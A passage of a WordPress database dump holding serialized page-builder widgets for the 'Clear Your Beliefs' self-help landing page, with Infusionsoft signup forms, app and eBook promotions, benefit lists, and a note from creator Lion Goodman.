wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><form class="infusion-form nd-form-1" style="position: relative; top: 10px ! important;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><p><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></p><form class="infusion-form nd-form-1" style="position: relative; bottom: -2px ! important;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> <br /><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div><p> </p></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1207:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p><form class="infusion-form rd-form-1" style="position: relative; bottom: -50px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:5:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:7:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}}}'),
(1275, 1739, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:507:"<center style="margin-top: -100px;"><div class="video-shadow" style="background-image: url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); background-repeat: no-repeat; background-size: contain; height: 288px; margin-top: 55px; padding-top: 75px; width: 600px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -74px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:573:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<div style="margin-left: -15px; margin-bottom: 0px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:873:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -32px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -25px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -48px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:659:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -25px; width: 118%; margin-left: -21px;"><img style="margin-top: -20px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1277, 1741, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:152:"<img class="size-full wp-image-1457 aligncenter  img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:507:"<center style="margin-top: -100px;"><div class="video-shadow" style="background-image: url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); background-repeat: no-repeat; background-size: contain; height: 288px; margin-top: 55px; padding-top: 75px; width: 600px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -74px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:573:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<div style="margin-left: -15px; margin-bottom: 0px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:873:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -32px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -25px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -48px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:659:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -25px; width: 118%; margin-left: -21px;"><img style="margin-top: -20px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
